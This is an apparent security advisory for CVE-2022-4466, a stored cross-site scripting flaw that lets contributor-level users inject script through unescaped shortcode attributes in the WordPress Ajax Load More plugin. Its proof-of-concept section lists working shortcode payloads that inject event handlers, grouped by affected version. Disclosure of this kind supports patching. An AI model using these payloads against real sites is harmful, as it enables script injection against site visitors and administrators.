WordPress Infinite Scroll – Ajax Load More < 5.6.0.3 – Contributor+ Stored XSS | CVE 2022-4466

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Examples (a lot of attributes are affected!, not just the ones below)

v < 5.6.0.3
[ajax_load_more id='" onmouseover="alert(/XSS-id-1/)"']
[ajax_load_more id='2" src onerror=alert(/XSSid-2/)//']
[ajax_load_more id='a = 1;alert(/XSSid-3/); var b']

[ajax_load_more button_label='"onmouseover=alert(/XSS-button_label/)//']
[ajax_load_more button_loading_label='"onmouseover=alert(/XSS-button_loading_label/)//']
[ajax_load_more button_done_label='"onmouseover=alert(/XSS-button_done_label/)//']

v < 5.6.0.1
[ajax_load_more max_pages='"onmouseover=alert(/XSS-max_pages/)//']

v < 5.6.0
[ajax_load_more repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more theme_repeater='" onmouseover="alert(/XSS/)"']
[ajax_load_more tag='" onmouseover="alert(/XSS/)"']

v < 5.5.5 (original from submitter)
[ajax_load_more css_classes='" onmouseover="alert(/XSS/)"']